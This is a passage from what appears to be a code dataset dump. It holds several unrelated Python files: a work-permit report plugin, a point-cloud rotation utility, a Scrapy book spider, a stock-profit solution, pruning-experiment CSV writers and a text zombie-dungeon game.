area_list_str:\n return\n # value = area_list_str.replace(\"u'\", \"\").replace(\"'\", \"\").strip(\"[\").strip(\"]\")\n value = area_list_str.replace(\"u'\", \"\").replace(\"'\", \" \").replace(\",\", \" > \").strip(\"[\").strip(\"]\")\n return value\n\n def get_permit_heading_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_permit_datetime_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session, use_display_value=False)\n return dataset\n\n # def get_permit_signature_and_name_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n # section4_user, section4_signature = self.get_full_name_and_signature(snapshot, self._SECTION_4_TITLE, sa_session)\n # section5_user, section5_signature = self.get_full_name_and_signature(snapshot, self._SECTION_5_TITLE, sa_session)\n # section6_user, section6_signature = self.get_full_name_and_signature(snapshot, self._SECTION_6_TITLE, sa_session)\n # section11_user, section11_signature = self.get_full_name_and_signature(snapshot, self._SECTION_11_TITLE, sa_session)\n # section12_user, section12_signature = self.get_full_name_and_signature(snapshot, self._SECTION_12_TITLE, sa_session)\n #\n # dataset = self.get_header_row(dataset)\n # colum_values = [section4_user or section5_user,\n # section4_signature or section5_signature,\n # section6_user,\n # section6_signature,\n # section11_user or section12_user,\n # section11_signature or section12_signature\n # ]\n # dataset.append(colum_values)\n # return dataset\n\n\n def get_permit_signature_and_name_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n section1_user, section1_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_1_TITLE, sa_session)\n section2_user, section2_datetime = self.get_section_approvals_user(snapshot, self._SECTION_1_TITLE, sa_session)\n section3_user, section3_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_3_TITLE, sa_session)\n section4_user, section4_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_4_TITLE, sa_session)\n section5_user, section5_datetime = self.get_section_approvals_user(snapshot, self._SECTION_5_TITLE, sa_session)\n section6_user, section6_datetime = self.get_section_approvals_user(snapshot, self._SECTION_6_TITLE, sa_session)\n section7_user, section7_datetime = self.get_section_approvals_user(snapshot, self._SECTION_7_TITLE, sa_session)\n section8_user, section8_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_8_TITLE, sa_session)\n section9_user, section9_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_9_TITLE, sa_session)\n section10_user, section10_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_10_TITLE, sa_session)\n section11_user, section11_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_11_TITLE, sa_session)\n section12_user, section12_datetime = self.get_section_approvals_user(snapshot, self._SECTION_12_TITLE, sa_session)\n section13_user, section13_datetime = self.get_section_approvals_user(snapshot, self._SECTION_13_TITLE, sa_session)\n section14_user, section14_datetime = self.get_section_approvals_user(snapshot, self._SECTION_14_TITLE, sa_session)\n section15_user, section15_datetime = self.get_section_approvals_user(snapshot, self._SECTION_15_TITLE, sa_session)\n\n dataset 
= self.get_header_row(dataset)\n colum_values = [section1_user,\n section1_datetime,\n section2_user,\n section2_datetime,\n section3_user,\n section3_datetime,\n section4_user,\n section4_datetime,\n section5_user,\n section5_datetime,\n section6_user or section7_user,\n section6_datetime or section7_datetime,\n section7_user or section6_user,\n section7_datetime or section6_datetime,\n section8_user,\n section8_datetime,\n section9_user,\n section9_datetime,\n section10_user,\n section10_datetime,\n section11_user,\n section11_datetime,\n section12_user,\n section12_datetime,\n section13_user,\n section13_datetime,\n section14_user,\n section14_datetime,\n section15_user,\n section15_datetime\n ]\n dataset.append(colum_values)\n return dataset\n\n\n\n\n def get_certificate_fields_dataset(self, certificate_logid, snapshot, dataset, sa_session):\n certificates = self.get_linked_certificates(certificate_logid, sa_session)\n dataset = self.get_header_row(dataset)\n column_values = [\n certificates.get('confined_space_certificate_no', ''),\n certificates.get('crane_lifting_certificate_no', ''),\n certificates.get('excavation_certificate_no', ''),\n certificates.get('box_up_certificate_no', ''),\n certificates.get('radiography_certificate_no', ''),\n certificates.get('diving_certificate_no', ''),\n certificates.get('scaffolding_certificate_no', ''),\n certificates.get('road_close_certificate_no', ''),\n certificates.get('nearby_high_voltage_certificate_no', '')\n ]\n dataset.append(column_values)\n return dataset\n\n def get_other_relevant_documents_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_safety_requirements_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_personal_protective_equipment_required_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_gas_measurement_results_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_approval_non_flamable_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_approval_flamable_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_communicate_with_requestor_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_gas_detection_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_work_permit_renewal_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_close_work_permit_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, 
dataset, sa_session)\n return dataset\n\n\nPlugin = HotWorkDataSet\n","sub_path":"PermitToWork/DataSets/HotWorkDataSet.py","file_name":"HotWorkDataSet.py","file_ext":"py","file_size_in_byte":40369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111826732","text":"import numpy as np\nfrom ply_file_internal import PlyData, PlyElement\n\ndef rand_rotation_matrix(deflection=1.0, seed=None):\n '''Creates a random rotation matrix.\n\n deflection: the magnitude of the rotation. For 0, no rotation; for 1, completely random\n rotation. Small deflection => small perturbation.\n\n DOI: http://www.realtimerendering.com/resources/GraphicsGems/gemsiii/rand_rotation.c\n http://blog.lostinmyterminal.com/python/2015/05/12/random-rotation-matrix.html\n '''\n if seed is not None:\n np.random.seed(seed)\n\n randnums = np.random.uniform(size=(3,))\n\n theta, phi, z = randnums\n\n theta = theta * 2.0 * deflection * np.pi # Rotation about the pole (Z).\n phi = phi * 2.0 * np.pi # For direction of pole deflection.\n z = z * 2.0 * deflection # For magnitude of pole deflection.\n\n # Compute a vector V used for distributing points over the sphere\n # via the reflection I - V Transpose(V). This formulation of V\n # will guarantee that if x[1] and x[2] are uniformly distributed,\n # the reflected points will be uniform on the sphere. Note that V\n # has length sqrt(2) to eliminate the 2 in the Householder matrix.\n\n r = np.sqrt(z)\n V = (\n np.sin(phi) * r,\n np.cos(phi) * r,\n np.sqrt(2.0 - z))\n\n st = np.sin(theta)\n ct = np.cos(theta)\n\n R = np.array(((ct, st, 0), (-st, ct, 0), (0, 0, 1)))\n\n # Construct the rotation matrix ( V Transpose(V) - I ) R.\n M = (np.outer(V, V) - np.eye(3)).dot(R)\n return M\n\nif __name__ == '__main__':\n def read_ply(filename):\n \"\"\" read XYZ point cloud from filename PLY file \"\"\"\n plydata = PlyData.read(filename)\n pc = plydata['vertex'].data\n pc_array = np.array([[x, y, z] for x,y,z in pc])\n return pc_array\n\n def write_ply(points, filename, text=True):\n \"\"\" input: Nx3, write points to filename as PLY format. 
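A hypothetical call: write_ply(np.zeros((10, 3)), 'out.ply') writes ten 'f4' (float32) vertices as an ASCII PLY file. 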
\"\"\"\n points = [(points[i,0], points[i,1], points[i,2]) for i in range(points.shape[0])]\n vertex = np.array(points, dtype=[('x', 'f4'), ('y', 'f4'),('z', 'f4')])\n el = PlyElement.describe(vertex, 'vertex', comments=['vertices'])\n PlyData([el], text=text).write(filename)\n # data in\n filename = 'printer_3d'\n pc_in = read_ply(filename + '.ply')\n pc_in = np.reshape(pc_in, (1,-1,3))\n # rotate\n r_rotation = rand_rotation_matrix()\n print(r_rotation)\n # data out\n pc_out = pc_in.dot(r_rotation)\n write_ply(pc_out[0], 'rot_' + filename + '.ply')\n # check radius\n v1 = np.sqrt(pc_out[0][:,0]*pc_out[0][:,0] + pc_out[0][:,1]*pc_out[0][:,1] + pc_out[0][:,2]*pc_out[0][:,2])\n v2 = np.sqrt(pc_in[0][:,0]*pc_in[0][:,0] + pc_in[0][:,1]*pc_in[0][:,1] + pc_in[0][:,2]*pc_in[0][:,2])\n print(v1 - v2)\n","sub_path":"src/general_utils.py","file_name":"general_utils.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"393060275","text":"import scrapy\nfrom ..items import BookItem\nfrom scrapy.linkextractors import LinkExtractor\n\nclass BooksSpider(scrapy.Spider):\n # 每个爬虫的唯一标识,采用类属性\n name = \"books\"\n\n # 定义爬虫的起始点,起始点可以是多个,这里只有一个\n start_urls = [\"http://books.toscrape.com/\"]\n\n # 实现start_requests方法\n def start_requests(self):\n yield scrapy.Request(\"http://books.toscrape.com\",\n callback=self.parse,\n headers={\"User-Agent\":\"Mozilla/5.0\"},\n dont_filter=True)\n\n # def parse(self, response):\n # # 提取数据\n # # 每一本书的信息在
中\n # # 我们使用css()方法找到所有这样的article元素,并以此迭代\n # for book in response.css(\"article.product_pod\"):\n # # 书名信息在article>h3>a元素的title属性中\n # # 例如A Light in the ...\n # name = book.xpath(\"./h3/a/@title\").extract_first()\n # # 书价信息在

元素的文本中,\n # # 如:

51.77

\n # price = book.css('p.price_color::text').extract_first()\n # yield {\n # \"name\" : name,\n # \"price\" : price,\n # }\n #\n # # 提取链接\n # # 下一页的url在ul.pager>li.next>a元素中\n # # 例如
  • next
  • \n # next_url = response.css(\"ul.pager li.next a::attr(href)\").extract_first()\n # if next_url:\n # # 如果找到下一页的url,得到绝对路径,构建新的Request对象\n # next_url = response.urljoin(next_url)\n # yield scrapy.Request(next_url, callback=self.parse)\n\n def parse(self, response):\n # 提取数据\n # 每一本书的信息在
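 # The selectors below mirror the commented-out version above: response.css()\n # with 'article.product_pod' returns one selector per book, and\n # extract_first() returns the first match or None, so 'name'/'price' may be\n # None on malformed pages. This reading is inferred from the code itself,\n # not from project documentation.\n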
 # Extract the data\n # Each book's information is inside an <article class=\"product_pod\"> element;\n # we use the css() method to find all such article elements and iterate over them\n for sel in response.css(\"article.product_pod\"):\n book = BookItem()\n # The title is in the title attribute of the article > h3 > a element,\n # e.g. <a href=\"...\" title=\"A Light in the Attic\">A Light in the ...</a>\n book['name'] = sel.xpath(\"./h3/a/@title\").extract_first()\n # The price is in the text of the <p class=\"price_color\"> element,\n # e.g. <p class=\"price_color\">£51.77</p>\n book['price'] = sel.css('p.price_color::text').extract_first()\n yield book\n\n # # Extract links\n # # The next-page url is in the ul.pager > li.next > a element,\n # # e.g. <li class=\"next\"><a href=\"catalogue/page-2.html\">next</a></li>\n # next_url = response.css(\"ul.pager li.next a::attr(href)\").extract_first()\n # if next_url:\n # # If a next-page url is found, build the absolute url and a new Request from it\n # next_url = response.urljoin(next_url)\n # yield scrapy.Request(next_url, callback=self.parse)\n\n # Pass the restrict_css parameter a CSS selector expression describing\n # the region that contains the next-page link (under li.next)\n le = LinkExtractor(restrict_css='ul.pager li.next')\n # Given a Response object, extract_links() extracts links from the page the\n # Response contains, following the rules described when the extractor was\n # created, and returns a list in which every element is a Link object,\n # i.e. one extracted link\n links = le.extract_links(response)\n if links:\n # Since the page has only one next-page link, links[0] gets the Link object;\n # its url attribute is already the absolute url of the linked page\n # (no further response.urljoin() call is needed), so use it to build\n # and submit the Request\n next_url = links[0].url\n yield scrapy.Request(next_url, callback=self.parse)\n","sub_path":"example/spiders/book_spider.py","file_name":"book_spider.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"373213433","text":"class Solution:\n\n def maxProfit(self, prices:list):\n\n length = len(prices)\n # dp_0: best profit so far while holding no stock; dp_1: best while holding one\n dp_0 = 0\n dp_1 = float('-inf')\n for i in range(length):\n dp_0 = max(dp_0, dp_1 + prices[i])\n dp_1 = max(dp_1, - prices[i])\n\n return dp_0\n\n","sub_path":"动态规划/121. 买卖股票的最佳时机.py","file_name":"121. 买卖股票的最佳时机.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"563127050","text":"import csv\nfrom datetime import datetime\nfrom typing import List\n\nimport pandas as pd\nimport torch\nimport yaml\nfrom IPython.core.display import display\n\nfrom LTH_for_Rational_ResNets import Mask\nfrom LTH_for_Rational_ResNets import argparser\n\nargs = argparser.get_arguments()\n\n\ndef make_csv(model, prune_percent: List[float], test_acc: List[float]):\n \"\"\"\n Save results of LTH experiments as csv files.\n\n Parameters\n ----------\n model\n prune_percent: List[float]\n A list with the percentage of weights that were pruned.\n test_acc: List[float]\n A list with the test accuracies of all pruning epochs.\n\n Returns\n -------\n PATH: str\n The path to the saved csv file.\n \"\"\"\n time_stamp = datetime.now()\n PATH = 'CSV/{}'.format(model) + '/{}'.format(time_stamp) + '.csv'\n with open(PATH, 'w', newline='') as csvfile:\n fieldnames = ['Percentage of Weights pruned', 'Test Accuracy']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, dialect='excel')\n\n writer.writeheader()\n for i in range(len(prune_percent)):\n writer.writerow({'Percentage of Weights pruned': prune_percent[i], 'Test Accuracy': test_acc[i]})\n\n make_all_results_csv(model, prune_percent, test_acc)\n return PATH\n\n\ndef make_all_results_csv(model, prune_percent: List[float], test_acc: List[float]):\n if args.prune_shortcuts:\n PATH = 'CSV/{}/'.format(model) + 'test_accs_shortcuts.csv'\n else:\n PATH = 'CSV/{}/'.format(model) + 'test_accs.csv'\n with open(PATH, 'a') as csvfile:\n fieldnames = ['pruning_percentage', 'test_acc']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, dialect='excel')\n for i in range(len(prune_percent)):\n writer.writerow({'pruning_percentage': prune_percent[i], 'test_acc': test_acc[i]})\n\n\ndef make_mask_csv(original_model, all_PATHS: List[str], model_names: List[str]):\n \"\"\"\n Visualize the masks resulting from the LTH experiments.\n\n Parameters\n ----------\n original_model:\n Model that is not pruned for comparison.\n all_PATHS: List[str]\n A list with the paths to the last saved checkpoints.\n model_names: List[str]\n\n Returns\n -------\n PATH_dim: str\n Path to the csv 
file which shows the reduction of the convolutional layers dimensions.\n PATH_weights: str\n Path to the csv file which shows the absolute number of pruned weights.\n PATH_percent: str\n Path to the csv file which shows the relative number of pruned weights in percent.\n \"\"\"\n time_stamp = datetime.now()\n args = argparser.get_arguments()\n\n original_mask: Mask\n original_mask = Mask.make_initial_mask(original_model)\n\n masks = [original_mask]\n for p in range(len(all_PATHS)):\n PATH = all_PATHS[p]\n checkpoint = torch.load(PATH)\n mask = checkpoint['mask']\n masks.append(mask)\n\n all_data_dim = []\n all_data_weights = []\n all_data_percent = []\n control_weights = []\n num_original = 0\n\n for m in range(len(masks)):\n mask = masks[m]\n data_dim = []\n data_weights = []\n data_percent = []\n total_weights = 0\n j = 0\n for key, values in mask.items():\n print(key)\n x = torch.nonzero(values)\n num_weights = len(x) - 2\n total_weights += num_weights\n data_weights.append(num_weights)\n\n if m == 0:\n control_weights.append(num_weights)\n else:\n data_percent.append((num_weights * 100) / control_weights[j])\n print((num_weights * 100) / control_weights[j])\n j += 1\n\n x_indices = []\n x_counter = 0\n\n y_indices = []\n y_counter = 0\n for i in range(x.shape[0]):\n x_i = x[i][0]\n y_i = x[i][1]\n\n if x_i not in x_indices:\n x_indices.append(x_i)\n x_counter += 1\n\n if y_i not in y_indices:\n y_indices.append(y_i)\n y_counter += 1\n x_y_data = [x_counter, y_counter]\n data_dim.append(x_y_data)\n print('x: ', x_counter)\n print('y: ', y_counter)\n\n if m == 0:\n num_original = total_weights\n total_percent = (total_weights * 100) / num_original\n data_weights.append(total_weights)\n data_weights.append(total_percent)\n all_data_dim.append(data_dim)\n all_data_weights.append(data_weights)\n if m != 0:\n all_data_percent.append(data_percent)\n\n if args.arch_for_run_all == 'CIFAR10':\n tuples, tuples_weights = csv_cifar_models(original_model)\n else:\n tuples, tuples_weights = csv_imagenet_models(original_model)\n index = pd.MultiIndex.from_tuples(tuples)\n index_weights = pd.MultiIndex.from_tuples(tuples_weights)\n df_dim = pd.DataFrame(all_data_dim, index=['Original Model'] + model_names, columns=index)\n df_weights = pd.DataFrame(all_data_weights, index=['Original Model'] + model_names, columns=index_weights)\n df_percent = pd.DataFrame(all_data_percent, index=model_names, columns=index)\n\n display(df_dim)\n display(df_weights)\n display(df_percent)\n PATH_dim = './CSV/Masks/{}'.format(time_stamp) + '_dim' + '.csv'\n PATH_weights = './CSV/Masks/{}'.format(time_stamp) + '_weights' + '.csv'\n PATH_percent = './CSV/Masks/{}'.format(time_stamp) + '_percent' + '.csv'\n df_dim.to_csv(PATH_dim, index=True)\n df_weights.to_csv(PATH_weights, index=True)\n df_percent.to_csv(PATH_percent, index=True)\n\n return PATH_dim, PATH_weights, PATH_percent\n\n\ndef csv_imagenet_models(model):\n \"\"\"\n Visualize masks for ImageNet models.\n\n Parameters\n ----------\n model\n\n Returns\n -------\n tuples: List[Tuple[str]]\n Tuples for the data frame.\n \"\"\"\n args = argparser.get_arguments()\n prune_shortcuts = args.prune_shortcuts\n\n num_layers = len(model.layers)\n\n array_0 = []\n array_1 = []\n array_2 = []\n array_3_conv_1 = ['conv. 0', 'conv. 1', 'conv. 2'] + ['conv. 0', 'conv. 1']\n\n if prune_shortcuts:\n if num_layers == 1:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 
1'] * 2\n\n elif num_layers == 4:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3 + ['Layer 2'] + [''] * 4 + ['Layer 3'] + [''] * 4 + ['Layer 4'] + [''] * 4\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] + ['BasicBlock 0', '', '', 'BasicBlock 1', ''] * 3\n array_2 = ['conv 0'] + ['conv. 0', 'conv. 1'] * 2 + array_3_conv_1 * 3\n\n elif num_layers == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3 + ['Layer 2'] + [''] * 4\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] + ['BasicBlock 0', '', 'BasicBlock 1', '', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 2 + array_3_conv_1\n\n else:\n if num_layers == 1:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 2\n\n elif num_layers == 4:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3 + ['Layer 2'] + [''] * 3 + ['Layer 3'] + [''] * 3 + ['Layer 4'] + [''] * 3\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] * 4\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 8\n\n elif num_layers == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3 + ['Layer 2'] + [''] * 3\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] * 2\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 4\n arrays = [array_0, array_1, array_2]\n arrays_weights = [array_0 + [''] * 2, array_1 + ['Total weights'] + ['Remained in %'], array_2 + [''] * 2]\n tuples = list(zip(*arrays))\n tuples_weights = list(zip(*arrays_weights))\n\n return tuples, tuples_weights\n\n\ndef csv_cifar_models(model):\n \"\"\"\n Visualize masks for cifar models.\n\n Parameters\n ----------\n model\n\n Returns\n -------\n tuples: List[Tuple[str]]\n Tuples for the data frame.\n \"\"\"\n num_layers = len(model.layers)\n args = argparser.get_arguments()\n prune_shortcuts = args.prune_shortcuts\n array_0 = []\n array_1 = []\n array_2 = []\n array_3_conv = ['conv. 0', 'conv. 1', 'conv. 2'] + ['conv. 0', 'conv. 1'] * 2\n array_3_conv_1 = ['conv. 0', 'conv. 1', 'conv. 2'] + ['conv. 0', 'conv. 1']\n\n if prune_shortcuts:\n if num_layers == 1:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 3\n num_bb = 0\n else:\n num_bb = model.layers[1]\n\n if num_layers == 3:\n if num_bb == 3:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5 + ['Layer 2'] + [''] * 6 + ['Layer 3'] + [''] * 6\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', ''] + ['BasicBlock 0', '', '', 'BasicBlock 1', '', 'BasicBlock 2', ''] * 2\n array_2 = ['conv 0'] + ['conv. 0', 'conv. 1'] * 3 + array_3_conv * 2\n elif num_bb == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 4 + ['Layer 2'] + [''] * 4 + ['Layer 3'] + [''] * 4\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] + ['BasicBlock 0', '', '', 'BasicBlock 1', ''] * 2\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 2 + array_3_conv_1 * 2\n\n elif num_layers == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5 + ['Layer 2'] + [''] * 6\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', ''] + ['BasicBlock 0', '', '', 'BasicBlock 1', '', 'BasicBlock 2', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 3 + array_3_conv\n\n else:\n if num_layers == 1:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 
1'] * 3\n num_bb = 0\n else:\n num_bb = model.layers[1]\n if num_layers == 3:\n if num_bb == 3:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5 + ['Layer 2'] + [''] * 5 + ['Layer 3'] + [''] * 5\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', ''] * 3\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 9\n elif num_bb == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3 + ['Layer 2'] + [''] * 3 + ['Layer 3'] + [''] * 3\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] * 3\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 6\n\n if num_layers == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5 + ['Layer 2'] + [''] * 5\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', ''] * 2\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 6\n arrays = [array_0, array_1, array_2]\n arrays_weights = [array_0 + [''] * 2, array_1 + ['Total weights'] + ['Remained in %'], array_2 + [''] * 2]\n tuples = list(zip(*arrays))\n tuples_weights = list(zip(*arrays_weights))\n return tuples, tuples_weights\n\n\ndef make_yaml(models: List[str], saved_models: List[str], print_log: str, table: List[str] = None, csv: List[str] = None, plot: List[str] = None):\n \"\"\"\n Make YAML file for experiment (series).\n\n Parameters\n ----------\n models: List[str]\n A list with the model name(s).\n saved_models: List[str]\n A list with the path(s) to the directory with the saved models.\n print_log: str\n The path to the print log.\n table: List[str]\n The paths to the three different mask tables.\n csv: List[str]\n The path(s) to the csv file(s).\n plot: List[str]\n The path(s) to the plot(s).\n \"\"\"\n LTH_args = argparser.get_arguments()\n time_stamp = datetime.now()\n yaml_data = [{'Date': [time_stamp]}, {'Model(s)': models}, {'Dataset': [LTH_args.dataset]}, {'Batch Size': [LTH_args.batch_size]}, {'Pruning Percentage per Epoch': [LTH_args.pruning_percentage]},\n {'Training Epochs per Pruning Epoch': [LTH_args.training_number_of_epochs]}, {'Learning Rate': [LTH_args.learning_rate]}, {'Warm-Up Iterations': [LTH_args.warmup_iterations]}, {'Training Milestones': [LTH_args.milestones]},\n {'Shortcuts pruned': [LTH_args.prune_shortcuts]}, {'Rational Inits': [LTH_args.initialize_rationals]}, {'Data Seed': [LTH_args.data_seeds]}, {'Saved Models': [saved_models]}, {'Print Log': [print_log]}, {'Testset augmented': [False]}]\n\n if LTH_args.stop_criteria == 'num_prune_epochs':\n yaml_data.append({'Iterative Pruning Epochs': [LTH_args.iterative_pruning_epochs]})\n elif LTH_args.stop_criteria == 'test_acc':\n yaml_data.append({'Test Accuracy Threshold': [LTH_args.test_accuracy_threshold]})\n\n if LTH_args.save_res_csv:\n yaml_data.append({'CSV File': [csv]})\n\n if table is not None:\n yaml_data.append({'Mask CSV File': [table]})\n\n if plot is not None:\n yaml_data.append({'Plot': [plot]})\n\n PATH = 'YAML/{}'.format(time_stamp) + '.yaml'\n with open(PATH, 'w') as file:\n documents = yaml.dump(yaml_data, file)\n","sub_path":"LTH_for_Rational_ResNets/LTH_write_read_csv.py","file_name":"LTH_write_read_csv.py","file_ext":"py","file_size_in_byte":13869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"501128724","text":"import random, time\nimport os\nimport outside_dungeon\n\nrandom.seed(time.time())\n\n###############################################################################\n# All ASCII art used in this file was pulled from the below site: #\n# -> http://patorjk.com/software/taag/#p=display&f=Ivrit&t=Zootopia%0A 
#\n# %0AArendelle%0A%0ACave%20of%20Wonders%0ANeverland%0AToontown #\n# %0APixie%20Hollow%0AThe%20Southern%20Isles%0AWonderland #\n# %0AParadise%20Falls%0AEnchanted%20Forest #\n###############################################################################\n\ndef show_menu():\n \"\"\"Shows the dungeon's menu\"\"\"\n menu = \"\"\"\n Dungeon Menu:\n Show Items in Loot Bag...................... L or l\n Show Your Health Status..................... H or h\n Show Zombie Health Status................... Z or z\n Attack Zombies.............................. A or a\n Display Room Menu........................... M or m\n Quit the Room............................... Q or q\n \"\"\"\n print(menu)\n\ndef show_fight_menu():\n \"\"\"Shows the fight menu to allow the user to make choices\n during the battle\"\"\"\n menu = \"\"\"\n Fight Menu:\n Show Your Health Status..................... H or h\n Show Zombie Health Status................... Z or z\n Throw a Punch............................... A or a\n Display Fight Menu.......................... M or m\n Run away.................................... Q or q\n \"\"\"\n print(menu)\n\ndef show_zombie_stats(zombies):\n \"\"\"Allows the hero to view the health stats of all zombies in\n a dungeon at one time\"\"\"\n for num in range(0, len(zombies)):\n if (zombies[num].health == 1):\n print(\"Zombie\", num + 1, \"needs only 1 hit before it dies.\")\n else:\n print(\"Zombie\", num + 1, \"needs\", zombies[num].health,\n \"hits before it dies.\")\n\ndef show_lives_remaining(player):\n \"\"\"Allows the hero to view his and the zombie's health stats\n during a battle and includes pretty pictures\"\"\"\n print(\"☺ \" * player.health)\n print(player.health, \"lives remaining!\")\n\ndef attack_zombies(hero, zombies):\n \"\"\"Simulates the battle in a dungeon\"\"\"\n menu_items = {'H': show_lives_remaining, 'Z': show_lives_remaining,\n 'M': show_fight_menu, 'A': attack_zombies}\n\n for num in range(0, len(zombies)):\n if (zombies[num].health == 0):\n continue\n print(\"You're fighting Zombie \", num + 1, \"....\", sep='')\n\n hero_die = random.randint(1, 6)\n zombie_die = random.randint(1, 6)\n\n if (hero_die >= zombie_die):\n print(\"You will throw the first punch, if you choose to battle.\")\n else:\n print(\"The zombie will throw the first punch\")\n if (zombies[num].throw_punch(hero)):\n print(\"The Zombie\", num + 1, \"punched you!\")\n hero.got_punched()\n else:\n print(\"The Zombie\", num + 1, \"swung and missed!\")\n\n show_fight_menu()\n choice = input(\"Enter [command]: \")\n choice_cap = choice.upper()\n while (hero.health != 0 and zombies[num].health != 0):\n while (choice_cap != 'Q'):\n func = menu_items.get(choice_cap)\n if (not func):\n print(\"Invalid Command!\")\n else:\n if (choice_cap == 'Z'):\n func(zombies[num])\n elif (choice_cap == 'H'):\n func(hero)\n elif (choice_cap == 'A'):\n if (hero.throw_punch(zombies[num])):\n print(\"You punched Zombie \", num + 1, \"!\", sep='')\n zombies[num].got_punched()\n if (zombies[num].health == 0):\n break\n else:\n print(\"You swung at the zombie and missed!\")\n\n if (zombies[num].throw_punch(hero)):\n print(\"The Zombie\", num + 1, \"punched you!\")\n hero.got_punched()\n else:\n print(\"The Zombie\", num + 1, \"swung and missed!\")\n print(\"\\n\")\n else:\n func()\n choice = input(\"Enter [command]: \")\n choice_cap = choice.upper()\n if (choice_cap == 'Q'):\n return -1\n\n if (hero.health == 0):\n print(\"Your were killed by Zombie \", num + 1, 